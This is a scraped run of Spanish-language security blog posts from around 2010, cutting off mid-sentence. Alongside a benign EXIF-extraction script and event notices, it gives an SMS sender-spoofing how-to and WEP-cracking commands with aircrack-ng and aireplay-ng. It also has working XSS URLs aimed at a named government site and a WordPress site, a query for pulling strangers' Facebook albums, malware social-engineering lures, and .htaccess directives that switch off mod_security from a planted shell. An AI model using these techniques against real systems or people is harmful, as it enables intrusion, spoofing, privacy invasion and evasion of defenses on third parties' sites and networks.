300px;" src="http://img709.imageshack.us/img709/6935/95271840.jpg" border="0" alt="" /><br /><br />Escribimos los sms con código internacional es decir para Perú:<br />+511993210000<br />El + es el símbolo internacional<br />51 es código de Perú<br />1 es código de ciudad de Lima<br />993210000 es el numero de celular<br />En teléfono/s:<br />Escribimos el numero o los números a los que llegara el SMS.<br />En Remitente el numero que falsificaremos para que llegue como si fuera de el:<br />Las otras opciones son irrelevantes.<br />Y así habremos falsificado el remitente de un SMS<br />Denle buen uso :D<br /><br /><br />Dr. NeoX<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-4111252383362215412?l=www.seguridadblanca.org' alt='' /></div>Dr. NeoXhttp://www.blogger.com/profile/11815577640037617192noreply@blogger.com2tag:blogger.com,1999:blog-8719246101146926876.post-78187975491449460672010-05-25T20:33:00.000-07:002010-05-30T20:49:48.063-07:002010-05-30T20:49:48.063-07:00Extraer metadatos de imagenes con php<p>¿Que aprenderemos hoy?</p><p>a saber si una foto a sido retocada, y poder ver la imagen original.</p><p>Bien los meta-datos son  Información que se guarda automáticamente al generar un archivo: .doc, .jpg,etc. y que no son visibles al ojo humano.</p><p>Esta información la genera el software que se utilizo para crear el archivo en el caso de las fotos, por ejemplo la genera el software de la cámara fotográfica ( solo si es digital ¬¬).</p><p>en el caso de las fotografiás un tipo de meta-datos son los EXIF.</p><p>bien los meta-datos EXIF contienen información importante como : fecha original, modelo de la cámara,etc. pero lo mas importante y en lo que se fijara este post es extraer el "THUMBNAIL" original.</p><p>Para los que no sabían cada vez que se modifica una imagen se guarda una copia en miniatura de la original que no se podría observar a simple vista, pero con algo de código podremos extraerlo.</p><p>ejemplo:</p><p><img style="cursor:pointer; cursor:hand;width: 320px; height: 194px;" src="http://3.bp.blogspot.com/_FlUDz6xPdUc/S_yiDCBwsyI/AAAAAAAAAAM/bFGr-vqvaaA/s320/meta-dato.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5475429419943244578" /></p><p>aquí vemos una foto trucada y a su lado el thumbnail extraido ( la foto original)</p><p><br /></p><p>¿Como la extraemos con PHP ?</p><p>con exif_thumbnail:</p><p>eh aquí un pequeño código el cual puedes modificar:</p><p> ------------------------------------------------------------------------<br /><p>&lt;?php</p><br /><p>set_time_limit ( 0 );<br /><br /></p><br /><p>function getmicrotime () { </p><br /><p>$temparray = split ( " " , microtime ()); </p><br /><p>$returntime = $temparray [ 0 ]+ $temparray [ 1 ]; </p><br /><p>return $returntime ; </p><br /><p>} </p><br /><p> </p><br /><p><br /><br /></p><br /><p>$maindir = "." ; </p><br /><p>$mydir = opendir ( $maindir ) ; </p><br /><p>$starttime = getmicrotime (); </p><br /><p>$i = 0 ; </p><br /><p>while( $fn = readdir ( $mydir )) </p><br /><p>{ </p><br /><p>$startimagetime = getmicrotime (); </p><br /><p>$ext = strtolower ( substr ( $fn , strlen ( $fn )- 3 ));</p><br /><p>if ( $ext == "jpg" ) { </p><br /><p>$i ++; </p><br /><p>echo $fn . " se proceso satisfactorio&lt;br&gt;" ; </p><br /><p>flush (); </p><br /><p> </p><br /><p>$image = exif_thumbnail ( $fn , $width , $height , $type );<br /><br /></p><br /><p>if ( $image !== false ) { </p><br /><p> </p><br /><p>$handle = fopen ( $fn . ".thumb.jpg" , 'a' ); </p><br /><p>echo "&lt;img src='".$fn."' width='400' height='301' /&gt;";</p><br /><p>echo "&lt;img src='".$fn .".thumb.jpg' width='400' height='301' /&gt;";<br /><br /></p><br /><p>fwrite ( $handle , $image ); </p><br /><p>} else {<br /><br /></p><br /><p>echo "imagen de miniatura no disponible para: " . $fn . "&lt;br&gt;" ;<br /><br /></p><br /><p>echo "&lt;img src='".$fn.".thumb.jpg' width='400' height='301' /&gt;";</p><br /><p>} </p><br /><p>} </p><br /><p>} </p><br /><p>closedir ( $mydir ); </p><br /><p>$endtime = getmicrotime ();<br /><br /></p><br /><p>echo "&lt;br&gt;Tiempo tardado " ; </p><br /><p>print $endtime - $starttime ; </p><br /><p>echo "&lt;br&gt; Imagenes procesadas: " . $i ; </p><br /><p> </p><br /><p>?&gt;</p><br /><br /><br />---------------------------------------------------------------------<br /><p></p><p></p><p>simplemente montalo en localhost, mete las fotos en la carpeta raíz y  voilá  , podrás ver las fotos originales .</p><p>Saludos Dr. NeoX. :)</p><p><br /></p><p><br /></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-7818797549144946067?l=www.seguridadblanca.org' alt='' /></div>Dr. NeoXhttp://www.blogger.com/profile/11815577640037617192noreply@blogger.com5tag:blogger.com,1999:blog-8719246101146926876.post-89589952989345689752010-05-24T19:11:00.000-07:002010-05-29T18:42:02.526-07:002010-05-29T18:42:02.526-07:00Dr. NeoX presentandoseHola que tal soy Carlos Ganoza (A.K.A.  <a href="http://todoporelvicio.blogspot.com/">Dr. Neox</a> ) de Perú, y les cuento que estaré escribiendo frecuentemente por aqui ( ese es el plan), después de haber aceptado la gentil invitación de un gran amigo y colega el Dr. White ( entre Doctores nos entendemos :P), espero colaborar con algo a este grandioso blog y junto al administrador podamos sacarlo adelante, ya le dije que vuelva a lo suyo y siga escribiendo  en su blog que la gente lo aclama jaja, sin mas que decir espero que me reciban bien y les guste mis post.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-8958995298934568975?l=www.seguridadblanca.org' alt='' /></div>Dr. NeoXhttp://www.blogger.com/profile/11815577640037617192noreply@blogger.com2tag:blogger.com,1999:blog-8719246101146926876.post-56706590591144883892010-05-24T18:59:00.000-07:002010-05-24T19:46:51.448-07:002010-05-24T19:46:51.448-07:00Cracking WEP - BackTrack 4Veo que hasta ahora no había puesto algo de esto... asi que ahora lo pondré...<br /><br />Primer paso:<br /><br />Abrir Consola...<br /><br />root@bt~#<br /><br />ahora escribamos lo siguiente:<br /><br />cd /pentest/<br /><br />luego:<br /><br />cd wireless<br /><br />luego:<br /><br />cd aircrack-ng<br /><br />ahora si estamos en el directorio ganador...<br /><br /><br />Ahora... si manos a la obra...<br /><br /><br />debe verse algo asi su consola:<br /><br />root @ /pentest/wireless/aircrack-ng # <br /><br />o algo parecido recuerden que mientras escribo esto solo es mi mente la que funciona no estoy nisiquiera en uina virtual machine con linux ni nada por el estilo...<br /><br />ahora...<br /><br />vamos a escribir lo siguiente:<br /><br />airmon-ng --> root @ /pentest/wireless/aircrack-ng # airmon-ng<br /><br />y nos debe mostrar algo como:<br /><br />Interface Chipset y Driver o algo por el estilo... ahora verificando siempre que nuestra Wlan0 esté presente...<br /><br />en el caso que no esté un airmon-ng start wlan0 bastará... ahora...<br /><br />vamos a encontrar redes disponibles... usaremos el airodump...<br /><br />root @ /pentest/wireless/aircrack-ng # airodump-ng wlan0<br /><br />ahora cuando ya tengamos en la mira la que queremos apretamos control + c para parar la operacion de la consola...<br /><br /><br />ahora visualizen bien el BSSID y el CH copien el BSSID y escriban lo siguiente:<br /><br />root @ /pentest/wireless/aircrack-ng # airodump-ng -c (ch) -w nombredelarchivo --bssid (11:22:33...)<br /><br />ahora el -w nombredelarchivo es el nombre de archivo donde se guardará la información para que sea posteriormente crackeada... el ch no va entre comillas tampoco el bssid yo lo puse asi para que se identifique...<br /><br /><br />si dan enter podrán ver que hay algo que dice #data bueno eso necesitamos que esté altísimo... como 1000... pero se mueve lento no...? bueno no estoy seguro si el BT 4 trae el Aireplay asi que si no está consiganlo xD habran otra consola lleguen a la carpeta del aireplay-ng y pongan...<br /><br />#aireplay-ng -1 0 -a bssid -h nuestra_macadress -e essid wlan0<br /><br />si todo salio bien nos debe decir successfull o algo asi ahora ponemos esto:<br /><br />#aireplay-ng -3 -b bssid -h nuestra_macadress wlan0<br /><br />y ahora si les va a salir una serie de cosas que cualquiera se creería hacker jajajajaja (chiste hacker ;)) bueno ahora si si ven la anterior consola donde teniamos corriendo el airodump veremos que el DATA se ha de haber subido a 4000 o algo por ahí... bueno ahora si ya tenemos suficiente informacion... para usar nuestro aircrack-ng... abrimos otra shell y ponemos:<br /><br />root @ /pentest/wireless/aircrack-ng # aircrack-ng -n 64 -b bssid nombredelarchivo-01.cap<br /><br />el nombre del archivo es el que escojimos cuando pusimos a correr el airodump... y el 01 se pone por default osea el programa solo lo pone...si ponemos enter de nuevo nos veremos asi mismo matrix los hexadecimales moviendose de una manera bien "aleatoria"... y depronto...<br /><br />Key Found! y nos dan un hexadecimal que le quitamos los puntos y lo ponemos como password para conectarnos y entramos....<br /><br /><br />Es fácil... solo practiquen y usen help para que puedan ejecutar variaciones... de los programas... ;)<br /><br /><br />Saludos<br />Dr.White<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-5670659059114488389?l=www.seguridadblanca.org' alt='' /></div>Dr.Whitehttp://www.blogger.com/profile/00396289618746910605noreply@blogger.com7tag:blogger.com,1999:blog-8719246101146926876.post-65266597594551738562010-05-12T20:58:00.000-07:002010-05-12T22:05:01.355-07:002010-05-12T22:05:01.355-07:00Backups & Full Source Code DisclosureDespués de no escribir un tiempo y estar de "vacaciones" gracias a un comentario de un colega, Carlos Ganoza, recordé un antiguo "bug" que se combina por configuración del servidor y editores de Texto.<br /><br />Bueno... Empezemos... <br /><br />Mientras Editamos Archivos en programas como GEDIT o el mismisimo OPEN-OFFICE se genera un archivo de backup... <br /><br />ejemplo Open-Office:<br /><br /><br />Archivo:<br />TOK.ODT<br /><br />Aechivo "backup":<br />.~lock.tok.odt#<br /><br />Bueno... si nosotros abrimos el archivo de backup con un editor de textos podríamos apreciar algo como:<br /><br />Camilo Dedalo White,PC-Dedalo/Camilo Dedalo,PC-Dedalo,12.05.2010 23:16,file:///C:/Users/Camilo%20Dedalo/AppData/Roaming/OpenOffice.org/3;<br /><br /><br />Es una especie de metadata que le da alguna referencia al sistema...<br /><br />bueno miren lo que hemos visto en el archivo .odt es informacion importante... en un linux hubiese bastado con hacer un "nano" o el uso de algun editor para poder ver esta información... que como repito es importante... ahora... yo me pregunto... que sería si pusiera un archivo .html en ves de poner un .odt o para hacerlo mas drástico...<br /><br />Un .PHP...<br /><br />Usando un Editor de PHP del estilo GEDIT cuando hacemos copias de seguridad de archivos ya guardados se le agrega el Sufijo ~ <br /><br />Ejemplo:<br /><br />Archivo:<br />TOK.PHP<br /><br />Archivo "backup":<br />TOK.PHP~<br /><br /><br />Nuestro problema ahora recide no si es cualquier archivo PHP sino, el hecho es que si nuestro administrador no sabe configurar bien el Server y en si el APACHE puede ocurrir algo desastroso...<br /><br />el problema con algunos otros editores inclusive que vienen por default en algunos servidores, dejan vivos los archivos del backup y si no están ocultos o sin permisos para que lo lea cualquier usuario si lo tenemos con un dominio o en un hosting que todos podamos ver (página web) entonces puede ocurrir algo como esto:<br /><br /><br />en:<br /><br />http://www.website.com/ <-- c:/website/<br /><br />si hacemos un ls podemos ver:<br /><br />Index.php<br />CMD.php<br />home<br />tipo.php<br />Index.php~<br />CMD.php~<br />tipo.php~<br /><br />¿por que?<br /><br />porque el editor de textos tiene un mal funcionamiento o nosotros cometimos un error al usarlo o estamos editandolos... en ese momento...<br /><br /><br />entonces viene el Black Hat y entra a <br /><br /><br />http://website.com/Index.php y dice... asu que buena página a ver... veamos que pasa si le agrego ~ al archivo...<br /><br />y como nosotros no sabemos configurar bien los web servers entonces el .php~ existe... que pasará?<br /><br /><br />nos lo muestra como texto plano...<br /><br /><br />Index.php~:<br /><br />include("/feeds/posts/default/template/home.html");<br />$nombre = $_GET['name'];<br /><br />bueno ahora estamos viendo el coe de index.php a ver si ya tenemos el code... ya podemos por lo menos ver que jalan una variable nombre... que no está filtrandose... entonces se deduce que por lo menos un xss podremos sacar...<br /><br /><br />Un Ejemplo real... que va contra mis principios éticos pero quiero que se diviertan... nada de andar defaceando o jugando con el xss:<br /><br />http://www.ifarhu.gob.pa/verpag.php~<br /><br />http://www.ifarhu.gob.pa/verpag.php?pag="&gt;&lt;script&gt;alert('SeguridadBlanca.Org')&lt;/script&gt;<br /><br />http://www.ifarhu.gob.pa/verpag.php?sec="&gt;&lt;script&gt;alert('SeguridadBlanca.Org')&lt;/script&gt;<br /><br /><br />y bueno dense cuenta como hay errores tan pequeños pero tan peligrosos<br /><br /><br />Podemos ver también mala configuracion en el htaccess... vemos directorios y vemos versión del servidor...<br /><br />http://www.ifarhu.gob.pa/transparencia/<br /><br /><br /><br />Espero les haya gustado ;)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-6526659759455173856?l=www.seguridadblanca.org' alt='' /></div>Dr.Whitehttp://www.blogger.com/profile/00396289618746910605noreply@blogger.com1tag:blogger.com,1999:blog-8719246101146926876.post-73624160950653111932010-04-13T19:08:00.000-07:002010-04-13T19:41:27.863-07:002010-04-13T19:41:27.863-07:00FliSol Perú<img src="http://flisol.pe/templates/siteground-j15-138/images/headerimg.jpg" width="400" height ="200" /><br /><br />Ya he registrado mi correo a la lista de participantes :) espero verlos a todos en FliSol Perú, se realizará en la universidad de San Marcos<br /><br /><br />click <a href="http://flisol.pe/images/stories/afiche%20flisol%20abril.jpg">aquí</a> para ver el banner<br /><br /><a href="Anota tu nombre en lista">https://listas.installfest.info/cgi-bin/mailman/listinfo/flisol-peru</a><br /><br /><br />el grupo de identi.ca click <a href="http://identi.ca/group/flisolperu">aquí</a><br /><br /><br /><br />espero verlos ahí, este evento promete mucho :), me reconocerán por mi polo/camiseta que diga... Dr.White...<br /><br /><br /><a href="http://www.flisol.pe">Página Oficial</a><br /><br /><br />Nos vemos<br /><br /><br />Saludos<br />Dr.White<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-7362416095065311193?l=www.seguridadblanca.org' alt='' /></div>Dr.Whitehttp://www.blogger.com/profile/00396289618746910605noreply@blogger.com1tag:blogger.com,1999:blog-8719246101146926876.post-77680467461202510922010-04-06T16:32:00.000-07:002010-04-06T16:45:41.759-07:002010-04-06T16:45:41.759-07:00OSEH - Open Sec Ethical Hacker - PresentaciónHace unas semanas di una charla para el último grupo de gente que se ha graduado como OSEH, el curso es muy didactico con gente con muchas experiencia, he tenido el agrado de asistir por segunda ves...<br /><br /><br />Lo que valen no son las diapositivas sino el que habla... <br /><br /><br /><div style="width:425px" id="__ss_3653216"><strong style="display:block;margin:12px 0 4px"><a href="http://www.slideshare.net/seguridadblanca/oseh" title="Oseh">Oseh</a></strong><object width="420" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=oseh-100406183025-phpapp02&stripped_title=oseh" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=oseh-100406183025-phpapp02&stripped_title=oseh" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="400" height="355"></embed></object><div style="padding:5px 0 12px">View more <a href="http://www.slideshare.net/">presentations</a> from <a href="http://www.slideshare.net/seguridadblanca">Camilo Galdos</a>.</div></div><br /><br /><br />Referencia del blog de Open-Sec click <a href="http://ehopen-sec.blogspot.com/2010/03/4-nuevos-oseh-open-sec-ethical-hacker.html">aquí</a><br /><br /><br />gr33tz: <a href="http://www.jbyte-security.blogspot.com">Jbyte</a>, <a href="http://www.malwarelabs.org">Sm0kes</a>, <a href="http://www.cuscosoft.com">Perverths0</a>, <a href="http://www.develsec.blogspot.com/">Backtracker</a> y mi papá :)<br /><br /><br />Saludos<br />Dr.White<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-7768046746120251092?l=www.seguridadblanca.org' alt='' /></div>Dr.Whitehttp://www.blogger.com/profile/00396289618746910605noreply@blogger.com0tag:blogger.com,1999:blog-8719246101146926876.post-1382351790570043482010-04-04T11:48:00.000-07:002010-04-04T11:53:42.392-07:002010-04-04T11:53:42.392-07:00Remarcando... en Facebook y Twitter somos SeguridadBlancaBueno muchachos les quería volver a decir que estamos wn Twitter y Facebook :)<br /><br /><br />En twitter somos SeguridadBlanca<br /><a href="http://twitter.com/seguridadblanca"><br />http://twitter.com/seguridadblanca</a><br /><br />y en facebook lo que estoy inaugurando hoy... es la página de facebook de SeguridadBlanca!!!<br /><a href=" http://www.facebook.com/pages/SeguridadBlanca/111357815549029"><br />http://www.facebook.com/pages/SeguridadBlanca/111357815549029</a><br /><br /><br />Espero sigan a seguridadblanca en twitter y espero se hagan fan en facebook.<br /><br /><br /><br />Saludos<br />Dr.White<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-138235179057004348?l=www.seguridadblanca.org' alt='' /></div>Dr.Whitehttp://www.blogger.com/profile/00396289618746910605noreply@blogger.com1tag:blogger.com,1999:blog-8719246101146926876.post-52943584801479764412010-04-04T10:36:00.000-07:002010-04-04T11:17:57.752-07:002010-04-04T11:17:57.752-07:00Facebook Query Language - Si estás en facebook cuidadoEn mi exposición del LimaHack sobre toqué el tema de las redes sociales pero hoy que andaba buscando una pequeña cosilla en facebook encontré un code de un query que te permitía ver fotos de gente que no tenías, despues de un cambio en su query ya no se podía o al menos yo estube tratando de multiples formas y no pude sacar las fotos como decía el tutorial, después de segui provando un rato dije mejor me remito al source code de los query chequearé el wiki de FACEBOOK...<br /><br /><a href="http://wiki.developers.facebook.com/index.php/Main_Page"><br />http://wiki.developers.facebook.com/index.php/Main_Page</a><br /><br /><br />después de dar unos click por aqui unos click por haya di con el FQL y yo me pregunté que será eso doy click y porfin dije llegué a donde quería...<br /><br /><a href="http://wiki.developers.facebook.com/index.php/FQL"><br />http://wiki.developers.facebook.com/index.php/FQL</a><br /><br /><br />podemos ver un par de ejemplos del query y su funcionamiento pero lo que nos ARMA con una ARMA LETAL y con la cual podemos obtener información importante es esto...<br /><br /><a href="http://developers.facebook.com/tools.php"><br />http://developers.facebook.com/tools.php</a><br /><br /><br />es una consola de pruebas podemos ejecutar un query para probar el funcionamiento del FQL...<br /><br /><br />ahora vamos a sacar algo bien interesante...<br /><br /><br />vamos a buscar a un Juan Sanchez antes de empezar con esto...<br /><br /><br />?init=quick&q=juan sanchez<br /><br />eso es masomenos lo equivalente a poner en el textbox de busqueda de facebook el nombre juan sanchez...<br /><br /><br />si le dan click derecho al nombre entonces pueden ver su Profile ID que es lo que necesitaremos a continuacion...<br /><br /><br />http://www.facebook.com/profile.php?id=XXXXXXXXXXXX<br /><br /><br />en la tool seleccionamos FQL.query<br /><br />ahora con una syntaxis del FQL vamos a ver que pasaría...<br /><br /><br />SELECT location, link FROM album WHERE owner=XXXXXXXX<br /><br /><br />y nuestro response sería...<br /><br /><code><br />&lt;?xml version="1.0" encoding="UTF-8"?&gt;<br /><br />&lt;fql_query_response xmlns="http://api.facebook.com/1.0/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" list="true"&gt;<br /><br /><br /><br />&#160;&#160;&lt;album&gt;<br /><br /><br /><br />&#160;&#160;&#160;&#160;&lt;location/&gt;<br /><br /><br /><br />&#160;&#160;&#160;&#160;&lt;link&gt;http://www.facebook.com/album.php?aid=-3&id=XXXXX&lt;/link&gt;<br /><br /><br /><br />&#160;&#160;&lt;/album&gt;<br /><br /><br /><br />&#160;&#160;&lt;album&gt;<br /><br /><br /><br />&#160;&#160;&#160;&#160;&lt;location/&gt;<br /><br /><br /><br />&#160;&#160;&#160;&#160;&lt;link&gt;http://www.facebook.com/album.php?aid=139786&id=XXXXXXX&lt;/link&gt;<br /><br /><br /><br />&#160;&#160;&lt;/album&gt;<br /><br /><br /><br />&lt;/fql_query_response&gt;<br /></code><br /><br /><br />(recalco el no es mi amigo en facebook nisiquiera conocido)<br /><br /><br />Lo que yo he hecho ahora ha sido pedir el album de una persona X que no ha configurado bien la privacidad de su facebook... configurando bien seu facebook pueden prohibir que cualquiera vea sus fotos sin embargo... quiero preveerlos de esto...<br /><br /><br />si investigan bien esto <a href="http://wiki.developers.facebook.com/index.php/FQL_Tables">http://wiki.developers.facebook.com/index.php/FQL_Tables</a> y en general los <a href="http://wiki.developers.facebook.com/index.php/Fql.query">FQL.QUERY</a> con un poco de imaginacion e ingeniería social le podemos sacar información a cualquier facebook... esto es un arma para ladrones de información, creo que por ese lado falla Facebook en su seguridad...<br /><br /><br /><br />Saludos<br />Dr.White<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-5294358480147976441?l=www.seguridadblanca.org' alt='' /></div>Dr.Whitehttp://www.blogger.com/profile/00396289618746910605noreply@blogger.com2tag:blogger.com,1999:blog-8719246101146926876.post-72273665498291051832010-04-02T14:09:00.000-07:002010-04-02T15:01:07.251-07:002010-04-02T15:01:07.251-07:00Xss por semana santa en Woothemes de wordpressDespués de tanto tiempo sin escribir curiosamente hoy descubrí un Xss que me animó el día y me dió ganas de actualizar el blog ya que no he tenido tiempo de actualizarlo por el colegio...<br /><br /><br />Bueno el Bug está en una pequeña variable mínima super mínima...<br /><br /><br />"S="<br /><br />como estos themes son e pago y no quiero atentar en contra de su "licencia" he decidido no publicar todo el code con error solo la parte que nos interesa...<br /><br /><br />searchWidget()<br /><br /><br />esa es la función que nos da esto:<br /><br /><code><br /><br /><br />&lt;form method="get" id="searchform" action="&lt;?php bloginfo('url'); ?&gt;"&gt;<br /><br />&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&lt;div&gt;<br /><br />&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&lt;input type="text" class="field" name="s" id="s"&#160;&#160;value="Search..." onfocus="if (this.value == 'Search...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Search...';}" /&gt;<br /><br />&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&lt;input type="submit" class="submit" name="submit" value="Search" /&gt;<br /><br />&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&lt;/div&gt;<br /><br />&lt;/form&gt;<br /></code><br /><br /> y bueno lo que hace posible el que se ejecute:<br /><br /><br /><code><br />&lt;h3 class="catheading"&gt;&lt;?php _e('Search Results',woothemes); ?&gt; for &lt;?php printf(__('\'%s\''), $s) ?&gt;&lt;/h3&gt;<br /></code><br /><br /><br />bueno bloginfo() tiene un conjunto de registros globales los cuales simplemente usan un motor de busqueda sin siquiera verificar lo que pasa por s= lo unico que nos hace ver el s= es que se hace un GET no hay un query ni nada por el estilo...<br /> <br /><br />ahora usando un ejemplo real sin animos de dañar a nadie...<br /><br /><br />http://adiirockstar.com/?s=Search...&submit=Search eso es lo que nos da cuando damos click en el boton de buscar... solo es una busqueda motora no es una query...<br /><br />ahora solo modificamos en el textbox a una codigo javascript<br /><br />http://adiirockstar.com/?s=%3Cscript%3Ealert%28%27SeguridadBlanca.Org%27%29%3C/script%3E&submit=Search<br /><br /><br />simple... solo uso la funcion alert() y listo lo tenemos...<br /><br /><br />como lo podríamos reparar? esto es lo mas difícil tenemos que recrearlo... y usar algo como...<br /><br /><br /><code><br />&lt;h3 class="catheading"&gt;&lt;?php _e('Search Results',woothemes); ?&gt; for &lt;?php printf(htmlentities(__('\'%s\''), $s)) ?&gt;&lt;/h3&gt;<br /></code><br /><br /><br />eso podría ser una solucion agregarle el filtro htmlentities, verifiquen la syntaxis que ahora no tengo un apache cerca ni un host... también pueden buscar otras maneras de bloquearlo pero esa les servirá bien por el momento...<br /><br /><br /><br /><br />Agradecimientos especiales a Sm0kes de <a href="http://www.malwarelabs.org">www.malwarelabs.org</a> quien me ayudó facilitandome fragmentos de código para descubrir los errores y que es un compatriota con mucha experiencia en el desarrollo de Software!<br /><br /><br />Saludos<br />Dr.White<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-7227366549829105183?l=www.seguridadblanca.org' alt='' /></div>Dr.Whitehttp://www.blogger.com/profile/00396289618746910605noreply@blogger.com0tag:blogger.com,1999:blog-8719246101146926876.post-21715046646385957372010-02-15T11:17:00.001-08:002010-02-15T12:04:37.995-08:002010-02-15T12:04:37.995-08:00Técnicas de Infección con Malware y Procedimiento IDespués de un tiempo de inactividad del blog he decidido empezar con un tema que calculo les va a servir a ustedes...<br /><br /><br />El tema de infecciones es algo que está afectando en la actualidad y pues les quiero mostrar el primer ejemplo, es del cual hablaremos hoy...<br /><br /><br />Infección Vía MSN, cuantas veces no les ha pasado que alguien le dice algo como:<br /><br /><br /><br />Hubo un Accidente en la puerta de mi casa mira las fotos<br /><br /><br />y a continuación nos mandan un archivo .zip o .rar con las supuestas fotos o sino<br /><br /><br />Mira las fotos de la fiesta :s no te ves tan bien...<br /><br /><br />y a continuación nos mandan un .zip o un .rar<br /><br /><br />Ahora les voy a explicar como funcionan estas técnicas... y como yo las usaría masomenos.<br /><br /><br /><br /><br />Bueno para empezar nosotros debemos saber algo básico... las Apis de MSN para hacer el malware...<br /><br /><br />Explicación de Apis de MSN click <a href="http://carlosnuel.spaces.live.com/blog/cns!7102C67D335FEB24!367.entry">aquí</a> y <a href="http://foro.elhacker.net/programacion_vb/guia_msn_en_vb-t153975.0.html;wap2=">aquí</a><br /><br /><br />Bueno ahora si miren lo que pasa es que normalmente estos malwares no son muy creíbles entonces debemos usar algo que convenza a la gente en especial si son hombres...<br /><br /><br />un ejemplo:<br /><br /><br />Mira las fotos que me conseguí de la mamasita de megan fox<br /><br />y a continuación el envio del RAR o ZIP que contenga esto...<br /><br /><br />otro punto clave que tenemos que tener claro es que el RAR debe tener siertas cosas claves en la configuración según con que los queremos infectar...<br /><br /><br />En el caso de que fuese un virus de pharming hay técnicas de como ocultar archivos en los .rar de tal manera que al descomprimir automáticamente se sobreescriba el archivo hosts y otras cosas que es algo de lo que voy a hablar pronto pero por ahora vamos a ver otra cosa que haremos con la infección...<br /><br /><br />Bueno hemos creado nuestro malware que se reproduce por MSN y ahora solo falta que poner en el .rar bueno miren, hay grupos de ciber delincuentes que se dedícan a la amenaza y extorción de web sites por ejemplo:<br /><br /><br />Encontramos un RFI en una web subimos una Shell y leugo le decimos al dueño que nos de dinero o la defaceamos, esto lógico causa una malestar en el webmaster y se niega, horas despues, la página cae, algo asi es para lo que se usa este tipo de malware...<br /><br /><br />Se los conoce como BOTNETS, digamos que es una RED de Computadoras que estan a la disposición de un mismo "master", entonces como funciona esto... el Master le mando a 500 personas su malware, luegos estas 500 se la mandaron a dos cada uno osea dos cayeron por que se ve como el anterior ejemplo, lo de megan fox, ahora asi va creciendo la botnet, una vez que se tiene un número prudente de computadoras zombies se procede a extorcionar a la gente... La siguiente conversación es Real solo sustituyo los nombres para no afectar a nadie...<br /><br /><br />Extorcionador dice:<br />* Eres el Admin de XXXXXXXXXXXXX.XXX?<br /><br />Admin dice:<br />* Si por?<br /><br />Extorcionador dice:<br />* Resulta que necesito dinero y tu me lo vas a dar<br />* en el caso que te reuses cago tu site<br /><br />Admin dice:<br />* de qe me hablas????<br /><br />Extorcionador dice:<br />* Puedo sacar tu sitio de internet en cuanto se me de la gana pero si quieres que siga en internet entonces necesito 40€<br /><br />Admin dice:<br />* jajaja quisiera ver eso<br /><br />Extorcionador dice:<br />* Mira tu sitio ahora mismo -.-<br /><br />Admin dice:<br />* como mierda hiciste eso, dejame en pax yo no he hecho nada como para que me cagues mi sitio webon que te pasa<br /><br />Extorcionador dice:<br />* no es personal necesito dinero y me lo vas a dar o no<br /><br />Admin dice:<br />* no<br /><br /><br /><br />Después de dos días el Admin le pagó los 40 Euros que le pidió, lo que hacía era usar el ancho de banda de todas sus computadoras zombies para hacerle un ataque de D.d.o.S (Distributed Denial Of Service) a su víctima...<br /><br /><br /><br />Bajo un procedimiento como este muchos delincuentes hacen de las suyas, pronto pondré medidas que se deben tomar para no sufrir de este tipo de ataques y como evitar ser infectado y formar parte de una BOTNET...<br /><br /><br /><br />PD: Pido disculpas por no poner nada pero he andado ocupado, pronto comenzaré a poner posts de calidad nuevamente :)<br /><br /><br />Saludos<br />Dr.White<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-2171504664638595737?l=www.seguridadblanca.org' alt='' /></div>Dr.Whitehttp://www.blogger.com/profile/00396289618746910605noreply@blogger.com1tag:blogger.com,1999:blog-8719246101146926876.post-37578682160628251982010-02-01T13:21:00.000-08:002010-02-01T13:23:06.610-08:002010-02-01T13:23:06.610-08:00Otro Tip para Shells (Safe_Mode y Mod_Security) By Zero BitsMuchos ya conoceran el tutorial sobre las shells de mi amigo _84kur10_, pueden verlo desde su fuente original desde AQUI.<br><br /><br /><br><br />Solo queria agregar a su excelente tutorial, otro tip., <br><br />"Bypassear safe_mode y Mod_security" para movernos mucho mejor en una shell y asi evitar problema. Dense cuenta que es un mini-tutorial que solo muestra los codes necesarios.<br><br /><br><br />Muchos tienen problemas con las Shells, porque no pueden hacer varias cosas que nos interesan, ya sabemis por que (Safe_Mode y Mod_Security), ¿Como se yo que el servidor los tiene activado?, pueden notar (dependiendo de la shell) arriba de la shell, que puede decir:<br><br /><br><br /><font color="red">Safe_Mode = ON</font><br><br /><font color="red">Mod_Security = ON</font><br><br /><br><br /><font color="red"><b>Desactivar Mod_Securirty</b></font><br><br /><br><br /><br />Buscamos por la shell, el fichero <i>.htaccess</i> y añadimos el siguiente code:<br><br /><br><br /><div class="px"><pre width="70">&lt;IfModule mod_security.c&gt;<br />SecFilterEngine OFF<br />SecFilterScanPort OFF<br />SecFilterCheckURLEncoding OFF<br />SecFilterCheckUnicodeEncoding OFF<br />&lt;/IfModule&gt;<br /></pre></div><br><br />Actualiza y ve xD... <br><br /><br><br /><b><font color="red">Desactivar Safe_Mode</font></b><br><br /><br /><br><br />Ahi varios modos, pero el mas facil es modificar 